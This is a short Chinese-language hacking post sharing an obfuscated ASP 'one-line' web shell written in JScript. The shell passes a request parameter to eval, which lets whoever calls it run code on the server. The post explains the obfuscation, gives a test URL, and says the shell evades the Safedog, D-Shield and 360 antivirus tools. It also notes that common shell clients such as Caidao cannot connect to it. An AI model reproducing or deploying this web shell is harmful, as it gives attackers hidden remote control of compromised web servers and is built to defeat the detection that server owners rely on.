ASP一句话也可以奇葩

大家都造PHP千变万化，从变量，数组，赋值，运算，函数等..没有一样不奇葩的！所以常说PHP的木马永远杀不干净

但是asp就悲剧了，它的脚本VBS用法很死板，不像PHP语法各种灵活和奇葩，不过别忘了asp是可以自定义脚本的

如果改成Javascript脚本来执行代码，也能像PHP木马一样奇葩

下面分享一下偶的一匹悍马

<%@LANGUAGE="javascript"%>
<%_()(_(!-''));function _(__){if(__){return Request('_')+''}else{return  eval
}}
%>

代码简单说明：

第一句，声明脚本为javascript

第二句，自定义了个函数_，当传入为空时返回 eval 函数，当传入为真时返回 _ 接收的值； !-'' 是1（True）的变形 （和PHP变形一样有木有？）

代码原形：

eval(Request('_')+'') ，注意 +'' 绝对不能忽略，这是把接来的值转为串，否则不能识别；

手连测试：

test.asp?_=Response.write%20(Date());  //输出当前时间

总结：

        用javascript来写asp，语法就能像php一样各种奇葩，但是注意以下几点：

1. 虽然能免杀狗，盾和360，还是有关键eval，所以对于靠关键词查杀的简单脚本和工具就报出来了

2.由于用的javscript脚本，所以用一般的客户端，如菜刀，斧头。。都连不上，有待码农开发个客户端。。。